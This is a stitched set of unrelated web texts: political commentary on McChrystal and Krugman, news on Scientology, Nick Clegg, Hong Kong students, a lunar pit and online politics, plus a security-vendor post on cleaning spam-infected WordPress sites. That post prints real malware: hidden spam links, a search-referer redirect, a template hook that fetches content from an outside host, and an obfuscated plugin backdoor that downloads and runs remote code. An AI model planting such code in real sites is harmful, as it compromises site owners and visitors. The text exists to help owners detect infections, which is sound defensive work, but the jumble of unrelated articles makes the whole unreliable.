Every real soldier will tell you the same thing . ’”
Describing a meeting near Kandahar between McChrystal and disaffected troops , Hastings writes : “ The soldiers complain about not being allowed to use lethal force , about watching insurgents they detain be freed for lack of evidence .
They want to fight — like they did in Iraq , like they had in Afghanistan before McChrystal . ”
Whether this view is really widely held among soldiers is not clear .
But it appears that this argument is gaining support within the Washington policy - making elite and within the media .
Hastings indicates his own standpoint — and , more broadly , that of many of McChrystal ’s establishment critics — when he declares : “ When it comes to Afghanistan , history is not on McChrystal ’s side .
The only foreign invader to have any success here was Genghis Khan — and he was n’t hampered by things like human rights , economic development and press scrutiny . ”
The New York Times weighed in on Wednesday , before the White House meeting between Obama and McChrystal at which the general submitted his resignation , with an article by its Afghan war correspondent , C. J. Chivers , headlined “ Warriors Vexed by Rules For War . ”
The article makes the case for the US to “ take the gloves off ” and dramatically escalate its assault on the Afghan population .
Chivers quotes unnamed soldiers denouncing McChrystal for limiting the use of air strikes and artillery , and declares : “ As levels of violence in Afghanistan climb , there is a palpable and building sense of unease among troops surrounding one of the most confounding questions about how to wage the war : when and how lethal force should be used . ”
He continues : “ The rules have shifted risks from Afghan civilians to Western combatants …
Young officers and enlisted soldiers and Marines … speak of ‘ being handcuffed … ’ ”
“ No one wants to advocate loosening rules that might see more civilians killed , ” he writes .
But this is precisely what The New York Times is demanding .
In its lead editorial published on Thursday , entitled “ Afghanistan After McChrystal , ” the Times demands a “ serious assessment now of the military and civilian strategies . ”
It then writes , in chilling language : “ Until the insurgents are genuinely bloodied they will keep insisting on a full restoration of their repressive power .
Reports that some State Department officials are also advocating a swift deal with the Taliban are worrisome . ” [ Emphasis added ] .
This statement , by the authoritative voice of the liberal Democratic Party policy - making establishment , provides an insight into the deeper issues involved in McChrystal ’s removal .
Apparently , for the Times , the United States has not pursued with sufficient vigor the work of “ seriously bloodying ” those in Afghanistan opposed to foreign occupation during more than eight years of war .
Tens of thousands of Afghans have already been killed by US and NATO forces — nobody knows the full extent of the slaughter since Washington does not bother to count its victims .
Tens of thousands more have been wounded , jailed or tortured in US prisons .
This campaign of killing and terror is aimed at drowning in blood an entirely legitimate struggle by the Afghan people for national liberation against a colonial occupier .
The main problem the US faces is that after eight years of war and more than three decades of US subversion and provocation , popular resistance by the Afghan masses against American imperialism is growing .
The answer of the US ruling elite is to murder more Afghans .
The war in Afghanistan is a crime against humanity , and those who are perpetuating it are war criminals .
The struggle to arouse opposition in the working class within the United States and internationally must be renewed .
Barry Grey
Barry Grey
0 SHARES Facebook Twitter
A common trend lately is SPAM getting added to WordPress blogs .
Attackers are using this to increase their page rank on search engines like Google , Yahoo , etc .
So , if you search for your site on Google do you see a bunch of “ viagra ” content instead of the original title ?
If you click on any link from Google are you redirected to a different page ?
In this article we will help you understand the techniques being used by the attackers and how to clean your blog .
Getting started
The first thing you have to do is to determine if your site have been hacked .
Our scanner should be able to tell you that or a Google search using your site name plus a few common spam keywords will help you identify it too .
Also , if you are our client , we can get your site fixed for you , so stop reading it and send us an email .
Once you determine that you have SPAM on your blog , you have a few places to check for them :
1- Spam hidden inside your templates footer or header files .
Those are easy to fix .
They are generally added at the bottom of the file and you will see lots of links in there .
Most of the time they come with under a hidden block ( visibility : hidden ) or in a modified position that is hard for the site owner to spot .
Examples : ( note that we added the spaces on purpose )
< div style = ” left : - 3265 px ; position : absolute ; top : - 4542 px ” >
c a r i s o p rodol p rice
< a href= ” http://www.arizonafoothillsmagazine.com .. >b u y c i a l is online in usa
< a href= ” http://news.vivatravelguides.com/ ” title= ” o n l i n e p h a r m a c y v i a g ra ” >
o n l i n e p h a r m a c y v i a g r a
x a n a x d o s a g es
s i d e effects cl om i d
b e s t o n l i n e p h a r m a cy cialis
How to check on my site ?
Open your footer . php and header . php and manually inspect for spam .
How to fix ?
Remove the spam entries or revert to clean backup .
2- Redirecting via .htaccess
This is another common technique and easy to fix .
Attackers add redirection on the .htaccess file so users coming from Google will go to their site instead .
In this article we go into detail about them : Conditional redirects .
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle . * [ OR ]
RewriteCond %{HTTP_REFERER} .* ask . * [ OR ]
RewriteCond %{HTTP_REFERER} .* yahoo . * [ OR ]
RewriteCond %{HTTP_REFERER} .* excite . * [ OR ]
RewriteCond %{HTTP_REFERER} .* altavista . * [ OR ]
RewriteCond %{HTTP_REFERER} .*msn . * [ OR ]
RewriteCond %{HTTP_REFERER} .* netscape . * [ OR ]
RewriteCond %{HTTP_REFERER} .*aol . * [ OR ]
RewriteCond %{HTTP_REFERER} .* hotbot . * [ OR ]
..
How to check my site ?
Open your .htaccess and look for those entries .
How to fix ?
Remove those entries from there or revert to a clean backup .
3- Spam getting called from general - templates .
php
This is becoming common now .
The general templates file is responsible for loading the themes , but the hacked one is also calling another site to get a list of SPAM keywords to use .
This is how a hacked general - templates file look like :
function get_footer ( $ name = null ) {
do_action ( ‘ get_footer ’ , $ name ) ;
if ( isset ( $_GET [ ‘ upd ’ ] ) == ‘ rss ’ ) { echo “< h1 > CURL – “ . @function_exists ( ‘curl
_init’ ) . ” < br > URLF – “ . @ini_get ( “ allow_url_fopen ” ) . ”< br></h1 > ” ;}
if ( preg_match (“ /bot|google|yahoo|bing|msnbot|crawl|slurp/i ” , @$_SERVER [‘HTTP_
USER_AGENT ’] ) ) {
if(@function_exists(‘ curl_init’ ) ) {
$ actualUpdate = @curl_init ( “ http://upgradesec.com/check.php?p=2&s=”.
@$_SERVE
R[‘ HTTP_HOST ’ ] ) ;
@curl_setopt($actualUpdate , CURLOPT_RETURNTRANSFER , 1 ) ;
@curl_setopt($actualUpdate , CURLOPT_TIMEOUT , 15 ) ;
@curl_setopt($actualUpdate , CURLOPT_HEADER , 0 ) ;
$ actualResult = @curl_exec ( $actualUpdate ) ;
@curl_close ( $actualUpdate ) ;
echo $ actualResult ;
}elseif ( @ini_get (“ allow_url_fopen ” ) == 1 ) {
echo @file_get_contents ( “ http://upgradesec.com/check.php?p=2&s=”. @$_SERVER [‘
HTTP_HOST ’ ] ) ;}
}
..
Can you see there ?
It is using curl to download a list of spam links from http:// upgradesec.com /check.php
How to check my install ?
Search for a “ curl ” call inside the wp- includes / general - templates .
php file .
How to fix it ?
Reinstall WordPress and this file will be overwritten .
4 - Spam getting called from a plugin
This is becoming more and more common .
The last case we fixed , the wp-db - backup.php was infected .
See the difference between the good and infected version :
diff - i - E -w -r wp-db-backup/wp-db-backup.php wp-db-backup-infected/wp-db-backup.php
39a40,213
> error_reporting (0 ) ;
> $ x0b=@wp_remote_fopen(“ x68x74164x70x3a 57x2fx65dus164162y.x63o155/x48x47x56i171x75164I131124cx49x7497x36x2f163x65r151x61154ix7ax65144 ″ ) ;
> if( function_exists(‘wp_cache_clean_cache’ ) &&isset ( $ file_prefix ) ) wp_cache_clean_cache($file_prefix ) ;
> $ isalive=strpos( $x0 b , ” i:0 ″ ) ;
> if ( $isalive!==false ) {
> $ array = unserialize ( $ x0 b ) ;
> $ fu=trim ( $ array [ 0 ] ) ;
> }
> $ blogurl=get_bloginfo(‘ wpurl ’ ) ;
>
> if ( $isalive !==false && $ fu < > ” ” ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _sh ” ) , $ array [ 1 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl . ” _gmi ” ) , $ array [ 2 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl .” _mc ” ) , $array [ 3 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl . ” _me ” ) , $ array [ 4 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl . ” _mt ” ) , $ array [ 5 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl .” _mspt ” ) , $ array [ 6 ] ) ;
> update_option ( “ rss_”.md5 ( $ blogurl . ” _fnl ” ) , $ array [ 7 ] ) ;
> update_option ( “ rss_”.md5 ( $ blogurl . ” _fpl ” ) , $ array [ 8 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl . ” _mbi ” ) , $array [ 9 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl . ” _gapi ” ) , $array [ 10 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl . ” _fpk ” ) , $array [ 11 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl .” _gsf ” ) , $array [ 12 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl . ” _m ” ) , $ array [ 13 ] ) ;
> update_option ( “ rss_”.md5 ( $ blogurl . ” _kw ” ) , $array [ 14 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl .” _desc ” ) , $array [ 15 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl .” _sfl ” ) , $array [ 16 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl . ” _wpp ” ) , $array [ 17 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl .” _wpp2 ″ ) , $array [ 18 ] ) ;
> update_option ( “ rss_”.md5 ( $blogurl . ” _gl ” ) , $array [ 19 ] ) ;
> }else {
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _sh ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _sh ” ) , $ array [ 1 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _gmi ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _gmi ” ) , $ array [ 2 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _mc ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl .” _mc ” ) , $array [ 3 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _me ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _me ” ) , $ array [ 4 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _mt ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _mt ” ) , $ array [ 5 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _mspt ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl .” _mspt ” ) , $ array [ 6 ] ) ;
> }
>
> if ( get_option ( “ rss_”.md5 ( $ blogurl . ” _fnl ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $ blogurl . ” _fnl ” ) , $ array [ 7 ] ) ;
> }
>
> if ( get_option ( “ rss_”.md5 ( $ blogurl . ” _fpl ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $ blogurl . ” _fpl ” ) , $ array [ 8 ] ) ;
> }
>
> if ( get_option ( “ rss_”.md5 ( $blogurl . ” _mbi ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _mbi ” ) , $array [ 9 ] ) ;
> }
>
> if ( get_option ( “ rss_”.md5 ( $blogurl . ” _gapi ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _gapi ” ) , $array [ 10 ] ) ;
> }
>
> if ( get_option ( “ rss_”.md5 ( $blogurl . ” _fpk ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _fpk ” ) , $array [ 11 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl .” _gsf ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl .” _gsf ” ) , $array [ 12 ] ) ;
> }
>
> if ( get_option ( “ rss_”.md5 ( $blogurl . ” _m ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _m ” ) , $array [ 13 ] ) ;
> }
>
> if ( get_option ( “ rss_”.md5 ( $ blogurl . ” _kw ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $ blogurl . ” _kw ” ) , $array [ 14 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl .” _desc ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl .” _desc ” ) , $array [ 15 ] ) ;
> }
>
> if ( get_option ( “ rss_”.md5 ( $blogurl . ” _sfl ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl .” _sfl ” ) , $array [ 16 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _wpp ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _wpp ” ) , $array [ 17 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _wpp2 ″ ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl .” _wpp2 ″ ) , $array [ 18 ] ) ;
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _gl ” ) ) ==false ) {
> update_option ( “ rss_”.md5 ( $blogurl . ” _gl ” ) , $array [ 19 ] ) ;
> }
> }
>
> if ( get_option ( “rss_”.md5 ( $blogurl . ” _gl ” ) ) ! = ” ” ) {
> $ x0l=@wp_remote_fopen(base64_decode(get_option ( “rss_”.md5 ( $blogurl. ” _gl ” ) ) ) ) ;
> update_option ( “ rss_”.md5 ( $blogurl .” _glnk ” ) , base64_encode ( $x0l ) ) ;
> }else {
> $ x0l=base64_decode(get_option ( “rss_”.md5 ( $blogurl.” _glnk ” ) ) ) ;
> }
>
> $ wpbeginex=” x62x61x731456x34x5fx64x65x63o144e ” ;
>
> $ wpsh=get_option (“rss_”.md5 ( $blogurl . ” _sh ” ) ) ;
> $ f_sh=create_function ( ” , $wpbeginex ( $wpsh ) ) ;
>
> $ wpgmi=get_option ( “rss_”.md5 ( $blogurl.” _gmi ” ) ) ;
> $ f_gmi=create_function ( ” , $wpbeginex ( $wpgmi ) ) ;
>
> $ wpmc=get_option ( “rss_”.md5 ( $blogurl . ” _mc ” ) ) ;
> $ f_mc=create_function ( ‘$ content ’ , $wpbeginex ( $wpmc ) ) ;
>
> $ wpme=get_option ( “rss_”.md5 ( $blogurl . ” _me ” ) ) ;
> $ f_me=create_function ( ‘$ excerpt ’ , $wpbeginex ( $ wpme ) ) ;
>
> $ wpmt=get_option ( “rss_”.md5 ( $blogurl . ” _mt ” ) ) ;
> $ f_mt=create_function ( ‘$ title ’ , $wpbeginex ( $wpmt ) ) ;
>
> $ wpmspt=get_option (“rss_”.md5 ( $blogurl.” _mspt ” ) ) ;
> $ f_mspt=create_function ( ‘$ single_title ’ , $wpbeginex ( $wpmspt ) ) ;
>
> $ wpfnl=get_option ( “rss_”.md5 ( $blogurl . ” _fnl ” ) ) ;
> $ f_fnl=create_function ( ‘$ link_to_fix ’, $wpbeginex ( $wpfnl ) ) ;
>
> $ wpfpl=get_option ( “rss_”.md5 ( $blogurl . ” _fpl ” ) ) ;
> $ f_fpl=create_function ( ‘$ link_to_fix ’, $wpbeginex ( $wpfpl ) ) ;
>
> $ wpmbi=get_option (“rss_”.md5 ( $blogurl.” _mbi ” ) ) ;
> $ f_mbi=create_function ( ‘$ result , $ show ’ , $wpbeginex ( $wpmbi ) ) ;
>
> $ wpgapi=get_option (“rss_”.md5 ( $blogurl.” _gapi ” ) ) ;
> $ f_gapi=create_function ( ” , $wpbeginex ( $wpgapi ) ) ;
>
> $ wpfpk=get_option ( “rss_”.md5 ( $blogurl .” _fpk ” ) ) ;
> $ f_fpk=create_function (‘$ PostID ’, $wpbeginex ( $wpfpk ) ) ;
>
> $ wpgsf=get_option (“rss_”.md5 ( $blogurl.”_gsf ” ) ) ;
> $ f_gsf=create_function ( ‘$ referer ’ , $wpbeginex ( $wpgsf ) ) ;
>
> $ wpm=get_option ( “ rss_”.md5 ( $ blogurl . ” _m ” ) ) ;
> $ f_m=create_function ( ” , $wpbeginex ( $wpm ) ) ;
>
> $ wpwpp=get_option (“rss_”.md5 ( $blogurl.” _wpp ” ) ) ;
> $ f_wpp=create_function ( ‘ $ data ’ , $wpbeginex ( $wpwpp ) ) ;
>
> $ wpwpp2=get_option ( “rss_”.md5 ( $blogurl.” _wpp2 ″ ) ) ;
> $ f_wpp2=create_function ( ‘ $ data ’ , $wpbeginex ( $wpwpp2 ) ) ;
>
> function my_previous_post_link ( $previous_post_link ) {
> return $ f_fpl ( $previous_post_link ) ;
> }
>
> function my_next_post_link ($next_post_link ) {
> return $ f_fnl ( $next_post_link ) ;
> }
>
>
> $ f_sh ( ) ;
> $ f_m ( ) ;
>
In this example , the code is loading SPAM from edustry.com , but we are seeing a wide variety of domains being used , so do not get too paranoid about this one .
Also , the plugins we find infected more often are the wp - db - backup , share - this and add - toany , but the attackers can use any plugin , so you have to check all of them .
How to fix it ?
This one is a bit more complicated to fix , specially if you have many plugins .
Our suggestion is to disable all the plugins until the spam is not showing up anymore ( make sure to clear your cache too ) .
Then enable each one at a time until you find the one that is hacked .
Conclusion
These are the most common techniques that are being used by the attackers , but you have to remember that they are also changing their tactics and leaving backdoors to be able to easily reinfect the sites .
So make sure to upgrade your WordPress installation and look for non-standard PHP files in your site .
If you had your site hacked like this and can share your experiences with us , we would love to hear from you !
If your site is hacked ( or contains malware ) , and you need help , send us an email at support@sucuri.net or visit our site : Sucuri Security Malware Removal .
We can get your sites cleaned up right away .
Also , consider checking out our site security monitoring .
We will monitor your sites 24×7 and alert you if it ever gets infected with malware , hacked or blacklisted .
Former members of the Church of Scientology have told a Senate committee of the ' ' ruthlessness ' ' of the church and its judicial system , and argued it should not be eligible for tax - free status .
'' Australian taxpayers should not be funding systematic , organised abuse , '' said Janette Vonthehoff , who said her passport was taken from her and she was forcibly prevented from returning to Australia from the US when eight weeks ' pregnant because the organisation ordered she must finish '' training ' ' .
Louise McBride ... defending Scientology .
Credit : Sahlan Hayes
Ms Vonthehoff said she resigned from the organisation in 2007 because of bullying , two coerced abortions and Scientology justice proceedings which included its own court hearings .
A Sydney tax lawyer and social identity , Louise McBride , defended the group and clashed with the independent senator Nick Xenophon during the hearing .
Preparing for my conversation with Nick Clegg at this year 's Guardian Hay festival results in a huge flow of questions from family , friends and colleagues – as well as from readers of Comment is free .
If the questions had a central theme it was : who is Nick Clegg ?
I was surprised by the level of interest .
My three children ( 15 , 13 , 10 ) all wanted to meet him .
( " Dad , is 30 a big or small number ? ' , my 13 - year - old daughter asks , a question that will not be put ! )
Two of their friends stayed on for an extra 24 hours just to hear him .
Some involved with the festival were concerned that he would face a hostile audience , but the reception started warmly and grew warmer .
Concerned that I would be accused of letting him off too lightly and warned by Simon Jenkins to cut off his flow , one of my numerous interruptions eventually generated cries of " Let him finish !
Let him finish ! " .
He charmed the audience , he came across as smart and passionate but not " a man of the left " ( " I'm a liberal " ) .
He easily won them over .
He has grown immeasurably as a politician since I first met him three years ago , when he used to complain that he could n't get his message across .
He seems entirely comfortable in his new job , even if he did n't want to own up to enjoying the first month .
What about substance ?
In such sessions the interviewer is caught in a dilemma : do you go micro on two or three big issues , digging in depth , or do you skirt across a wider range of issues and deal with more , but only superficially ?
It 's a difficult balancing exercise .
This audience wanted more , as the range of questions made clear , from parliamentary reform to school closures and a raft of issues in between .
On the processes of how the new government came about , we got insights into the timing .
But I doubt his answer will satisfy the question from Toonbasedmanc : what would he tell 11,000 Lib Dems voters in Hexham who voted Lib Dem to keep the Tories out ?
If people wanted a perfectly pure outcome at the election , Clegg said , that 's what they would have voted for .
" To those who want purity , go out and campaign for purity ... I believe in pluralism . "
And he swatted away Clive JW 's question on being in coalition with a Tory party that had spurned moderates in the European parliament to climb into bed with what Clegg called during the campaign " a bunch of nutters , antisemites ... and homophobes " .
There was no bed - sharing in Strasbourg or Brussels .
He was careful to avoid substance on issues that are in the pipeline , like possible rises in VAT ( I would predict from his answer to my question that they are coming ) and the timing of major legislation on constitutional reform , including a vote on AV ( it will be less than 13 years ! ) .
And we know it 's likely that big hikes in university fees are on their way , and that there is no clear plan about what to do to guarantee mobility for prospective students from poorer backgrounds who wo n't be able to afford expensive , city - based universities .
On foreign affairs he was more expansive .
It seems the use of military force in relation to Iran is not off the table , as the Lib Dem manifesto urged .
And in response to a question from Gandolfosreturn , Israel may be subject to increased pressures , Clegg said , including possible economic measures , to end the Gaza blockade on humanitarian relief .
On the Chilcot inquiry on the Iraq war , there was a major development : a clear commitment to make sure that the inquiry is able to publish a great number of documents : the current protocol on a presumption of confidentiality and secrecy will be changed to a presumption of publication , but most likely to coincide with the inquiry 's report , whenever that may be .
It was a polished display , and judged by audience some audience members I spoke to one that was perceived as frank and honest .
" It was n't dull and it was n't a performance , " a leading light from the world of theatre said to me .
" That 's what I liked about it . "
It 's always the right time to ignore Paul Krugman , the New York Times columnist , Nobel Laureate and four - time Latin Grammy nominee whose drink - yourself - sober advice on handling the debt crisis is so sharply at odds with reality .
Of late , Krugman has had his Irish up at Europeans who are resisting the Obama Administration 's plan to continue spending hundreds of billions on financial stimulus .
( Not that he agrees with the administration , which Krugman has been arguing for the last 18 months should be spending trillions , not mere billions , on stimulus . )
And in the case of Bundesbank president Axel Weber — whom Krugman called out recently in the daily Handelsblatt for trying to shore up the falling euro at the expense of government job creation — it 's created a backlash .
The Wall Street Journal reports that Krugman 's criticism has turned him into the anti-Hasselhoff and boosted Weber 's popularity as he pursues the top job at the European Central Bank :
Wolfgang Franz , who heads the German government 's economic advisory panel known as the Wise Men , tore into Krugman — and the US — in an op -ed in the German business daily Wednesday , titled " How about some facts , Mr. Krugman ? "
" Where did the financial crisis begin ?
Which central bank conducted monetary policy that was too loose ?
Which country went down the wrong path of social policy by encouraging low income households to take on mortgage loans that they can never pay back ?
Who in the year 2000 weakened regulations limiting investment bank leverage ratios , let Lehman Brothers collapse in 2008 and thereby tipped world financial markets into chaos ? " he wrote .
Unfortunately , as Krugman notes in his response , Franz managed to find the weakest arguments against the Times ' fiscal shaman .
Europeans have lost their appetite for digging deeper holes of debt for the same reason Americans have : because they do n't have a choice .
As Margaret
Thatcher predicted would happen , we have all run out of other people 's money .
That reality explains a lot more than airy references to Germans ' anti-inflationary mass psychology .
We 're at the tail end of the largest economic intervention since World War II , and even on its own narrow , nebulous terms , it has been a colossal failure .
The failure is obvious to working people .
It 's obvious to unemployed people .
It 's obvious to kindergarteners , to dogs and cats .
Only Paul Krugman persists in thinking good things will happen if we just throw more money on the barbecue .
Hong Kong , China ( CNN ) --
They are coming from cities across China , including Beijing and Shanghai :
Students are leaving mainland China for the opportunity to study in Hong Kong instead .
" We are a small elite who can afford freedom beyond China 's great firewall , " says " Li Cheng " from Shanghai .
Li , a student at the University of Hong Kong , did not want to disclose his real name or details about his study program , fearing consequences back home .
" I live in one country , but it feels like having two identities , " Li said .
" In Shanghai , I use special software to access sites blacklisted by the government , like Twitter or the uncensored version of Google .
" In Hong Kong , I am taught to integrate these tools in my research . "
In the past , students such as Li would have to travel to far - away countries to get around Beijing 's control of information .
Now , they are taking advantage of Hong Kong 's special administrative status that allows for a " one country , two systems " rule until 2047 .
Hong Kong is nothing like mainland China in terms of its free flow of information , freedom of speech and multiparty political system .
Those differences were recently emphasized by Google 's row with the Chinese government over censorship .
In March , Google announced it was routing its users to an uncensored version of the internet search engine based in Hong Kong , amid speculation that Google would pull out of China entirely .
China 's reaction to Google 's announcement
" When Google redirected its site from China to Hong Kong , it meant a lot of publicity for our free harbor , " said David Bandurski , a China analyst at the University of Hong Kong ( HKU ) .
He studies censorship issues .
" [ Google 's ] move has emphasized Hong Kong 's significance in China , benefiting from the rule of law and its potential as a free information hub . "
Many young Chinese have explored that hub since 1997 when the the British colony was handed over to China , paving the way for Chinese from the mainland to apply to universities in Hong Kong .
The influx of students applying from the mainland created fierce competition to enter Hong Kong 's top universities .
The number of mainland Chinese applying for HKU 's undergraduate program has increased more than tenfold in the past decade .
In 2008 , some 12,000 mainlanders applied for the 300 slots that HKU reserves for students from mainland China .
Li Cheng said he considers himself very lucky to be studying in Hong Kong
" Free access to information is a need and a privilege , " he said .
The influx of talent such as Li could signify a brain drain for mainland China , according to Bandurski .
" Without political reform , economic growth in China will decline , " he said .
" Talents will leave China .
Students and teachers who want to have more access to information are not dissidents anymore .
They are becoming the mainstream . "
Asia 's top five universities are now located in Hong Kong , Singapore and Japan -- outstripping their rivals in mainland China -- according to a recent ranking of QS , a higher education information network company .
The top mainland school was Peking University in Beijing in 12th place , down from its previous ranking of 10 .
See Asian university rankings
The data show that " the tide has turned , " according to Paul Denlinger , an internet consultant based in Hong Kong and Beijing .
" During the dotcom era [ of the 1990s ] , head - hunters were looking for talent from universities in Shanghai and Beijing , " Denlinger said .
" Now they are coming to Hong Kong . "
With new freedom at hand , only a few fresh HKU graduates have returned to the mainland .
Last year , only 3 percent of HKU graduates from mainland China returned home to look for a job .
That matches the trend of Chinese students studying overseas .
More than 70 percent of the more than 1 million Chinese students abroad did not return home after graduation between 1978 and 2006 , according to a report by the Chinese Academy of Social Sciences
Aware of this brain drain , the Chinese government has recently introduced a plan to attract highly qualified students back to the mainland promising better living standards , including favorable access to medical care .
But that has n't tempted Li Chang who , like many of his friends , wants to stay in Hong Kong .
" I love my country , but I do n't want to give up on my right to access information , " he said .
Erich Maria Remarque was a German infantry soldier who served in the trenches of World War One .
In 1928 he published his memoirs , " Im Westen Nichts Neues . "
The book was an unflinching look into the lives of the common soldier , and a striking condemnation of war and its effects .
It struck a chord in a world still stunned by the carnage of Verdun , and sold over two million copies in its first year .
Hitler was less than impressed , however , and the book was banned in Nazi Germany .
But that did n't stop director Lewis Millstone from making one of the best novel - to - movie adaptations ever .
The film is at once both deeply lyrical and savagely brutal , contrasting the banality of army life with the sudden punctuation of mindless violence so effectively that the film won the Academy Award for Best Picture .
Back then , that actually meant something .
Impact craters are visible everywhere on the Moon , but pits are rare .
This pit in Mare Ingenii ( located at - 35.95 °N , 166.06 °E ) is about 427 feet ( 130 meters ) in diameter .
Full Story .
New photos of the moon have revealed the most detailed viewsyet of a rare hole in the lunar surface — a pit large enough to swallow anentire football field whole .
High - resolution cameras aboard the Japanese Kaguyaspacecraft first spotted the irregularly shaped chasm , located in Mare Ingeniion the moon 's southern hemisphere .
Now , NASA 's Lunar Reconnaissance
Orbiter hastaken a new , up - close photo of the moon pit from lunarorbit .
" Only three have been discovered thus far , so I believeit is safe to state that skylights ( pits ) are rare at the 100 - meterscale , " Mark Robinson , principal investigator for the Lunar ReconnaissanceOrbiter Camera ( LROC ) at Arizona State University , told SPACE.com in an e-mail .
Mare Ingenii , also called the " sea of cleverness , " is best known for its prominent lunar swirls , which are highly reflectivesurface features that are associated with magneticanomalies .
The new images of the region from LROC show a giant pitmeasuring about 427 feet ( 130 meters ) in diameter .?
The boulders and debris resting on the floor of the cavityare partially illuminated and likely originated at the surface , falling throughthe pit opening during its collapse .
The hole is thought to be the result of apartially collapsed lava tube .
A similar moon pit , which was believed to be a skylight intoa lava tube , was previously discovered by the Kaguya mission in the MariusHills region of the moon .
The new pit in Mare Ingenii , however , lacks thenumerous volcanic features that were found in the Marius Hills region .
" The existence of lava tubes and thus skylights hadlong been postulated , " Robinson said .
" However it is a surprise to mehow large and beautifully preserved are the three that we have seen thusfar . "
Closer examination of Mare Ingenii could help scientistsunderstand the differences between the two areas of the lunar surface , and suchdiscoveries could also spur on furtherexploration of the moon , said Robinson .
" Imagine how fantastic it would be to land in one ofthese skylights and explore underground on the moon ! " he said .
Editor 's note : Gregory Ferenstein is an author and educator who writes about the intersections of technology , business and politics .
He teaches at the University of California , Irvine , and is a fellow at the University of California Center for the Study of Democracy .
( CNN ) --
From the micro-donation platform first popularized by Howard Dean in 2003 to the million - strong Barack Obama Facebook page to the huge audience of the Huffington Post , liberals have been the dominant political force on the internet since the digital revolution began .
Now , research out of Harvard University 's Berkman Center for Internet and Society suggests that the reason behind this imbalance may be the liberal belief system itself .
Liberals , the research finds , are oriented toward community activism , employing technology to encourage debate and feature user - generated content .
Conservatives , on the other hand , are more comfortable with a commanding leadership and use restrictive policies to combat disorderly speech in online forums .
All of this suggests that the internet may benefit liberals more often than conservatives -- at least for now .
The different approaches of the top two political blogs may illustrate the correlation between ideology and online strategy .
The Huffington Post 's closest conservative competitor , Hotair.com , has only a fraction of its audience size and is tightly controlled by an inner circle of three authors .
A leading right - wing blog , Hot Air was founded by Michelle Malkin , an author who is known for her support of wartime loyalty oaths and racial profiling as a defense against terrorism .
In criticizing Obama 's 2009 address to the United Nations , she said , " he solidified his place in the international view as the great appeaser and the groveler in chief . "
Indeed , Malkin's hard - line national security views are matched by Hotair 's unusually restrictive comment policy .
The site permits comments only by registered users ; currently , registration is closed to any new users .
The site states , " We may allow as much or as little opportunity for registration as we choose , in our absolute discretion , and we may close particular comment threads or discontinue our general policy of allowing comments at any time . "
By contrast , the left - leaning Huffington Post , the most visited blog on the Internet , has thousands of bloggers and invites active users to become featured authors and comment facilitators .
Founder Arianna Huffington herself supported working diplomatically with the international community to deal with Saddam Hussein and recently endorsed Jeremy Rifkin 's book " The Empathic Civilization , " which she says " allows humanity to see itself as an extended family living in a shared and interconnected world . "
Thus , from just a snapshot of the top political bloggers , one catches a glimpse of an emerging pattern : leadership and control from the right , and equality and community on the left .
Harvard professor Yochai Benkler finds that these differences are representative of the broader political web .
" The left not only chooses more participatory technology , but also uses the available technological tools to maintain more fluid relations between secondary or user - contributed materials and those of primary contributors , " he writes .
" The left is more egalitarian in opportunities for speech , more discursive , and more collaborative in managing the sites . "
By contrast , Hot Air 's prohibitive policies , and Malkin 's support of strong leadership , seem consistent with Benkler 's conclusion that the right is more " hierarchical " in its approach .
While any definitive statements about a technology still in its infancy are premature , the inclusiveness of the liberal approach does seem to have its advantages .
Obama 's Internet strategy is credited with giving grass - roots supporters space to find unique ways to reach their more apathetic peers and motivate them through user - generated content .
This openness to outsiders gave rise to surprising internet sensations such as the iconic " Hope " poster and enormous gatherings coordinated by social - networking activists .
Indeed , conservative Scott Brown 's stunning victory in a Massachusetts Senate race took its strategy from Obama 's playbook .
Instead of micromanaging the campaign message , Brown permitted an unknown universe of latent conservative activists to contribute as they saw fit .
